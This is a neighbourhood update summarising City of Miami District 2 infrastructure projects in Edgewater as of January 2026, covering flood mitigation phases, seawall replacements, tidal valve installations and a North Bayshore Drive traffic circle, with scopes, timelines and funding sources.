Edgewater 2026 Infrastructure & Resilience Projects

City of Miami – District 2 Update

The City of Miami continues to advance several major infrastructure, flood mitigation, and pedestrian safety projects within Edgewater. Below is a summary of active and upcoming projects affecting our neighborhood, based on the City’s January 2026 District 2 Project Status Update.


Edgewater Flood Improvements – Phase I

Project ID: 40-B233805

This large-scale flood mitigation project is designed to reduce roadway flooding, improve stormwater capacity, and strengthen long-term resilience in Edgewater.

Scope of Work

  • New and upsized stormwater pipes and inlets
  • Lining of existing outfall pipes
  • Construction of a stormwater pump station with injection wells
  • Roadway reconstruction, milling, and resurfacing
  • ADA ramps, signage, and pavement markings

Project Phasing
Due to funding constraints, the project is being delivered in two phases:

Phase 1

  • NE 23 Street between NE 4 Avenue and Biscayne Bay
  • NE 4 Avenue from NE 23 Street to NE 22 Terrace

Phase 2

  • NE 22 Terrace between NE 4 Avenue and Biscayne Bay
  • NE 22 Street between NE 4 Avenue and Biscayne Bay
  • NE 4 Avenue between NE 24 Street and NE 23 Street
  • NE 4 Avenue between NE 22 Terrace and NE 22 Street

Status & Timeline

  • Design-build project currently in the design phase
  • Construction anticipated to begin July 2026
  • Estimated completion October 2027

Funding Notes

  • Combination of Miami Forever Bond and federal/state grants
  • Portions of federal funding are at risk due to strict completion deadlines

Replacement of Eight Seawalls in Edgewater

Project ID: 40-B233810

This project focuses on replacing aging seawalls along Biscayne Bay to protect public infrastructure and improve coastal resilience.

Scope of Work

  • Seawall replacement or elevation
  • Installation of tidal valves and manatee grates
  • Riprap installation and outfall improvements
  • Roadway milling, resurfacing, lighting, and landscaping

Status & Timeline

  • Project currently in design
  • Updated design resubmittals expected early 2026
  • Construction anticipated February 2027 through February 2028

Permitting

  • Multiple permits under active review with DERM, FDEP, and USACE
  • Coral relocation plans required for select locations

Citywide Tidal Valve Installations (Edgewater Locations)

Project ID: 40-B233806

As part of the City’s Sea Level Rise Resilience Plan, tidal valves are being installed to prevent seawater from entering stormwater systems during high tide events.

  • 127 N. Bayshore Drive at NE 21 Street
  • NE 31 Street east of NE 7 Avenue
  • 2123 N. Bayshore Drive

Status

  • Design phase underway
  • Valves are being procured for phased installation
  • Construction will occur under an existing citywide stormwater contract to accelerate delivery

Pedestrian Safety & Traffic Calming

North Bayshore Drive Traffic Circle

Project ID: 40-B203614

A new traffic circle is being constructed to improve pedestrian safety and traffic flow along North Bayshore Drive.

Location

  • North Bayshore Drive between NE 15 Street and NE 17 Terrace

Improvements Include

  • Traffic circle installation
  • Sidewalk and ADA ramp upgrades
  • Drainage improvements
  • Landscaping and lighting enhancements

Status & Timeline

  • Construction began February 2026
  • Estimated completion September 2026
  • Groundbreaking ceremony scheduled for March 2, 2026

Funding

  • Supported by the Omni CRA
  • Additional City and CITT funding allocated to support completion
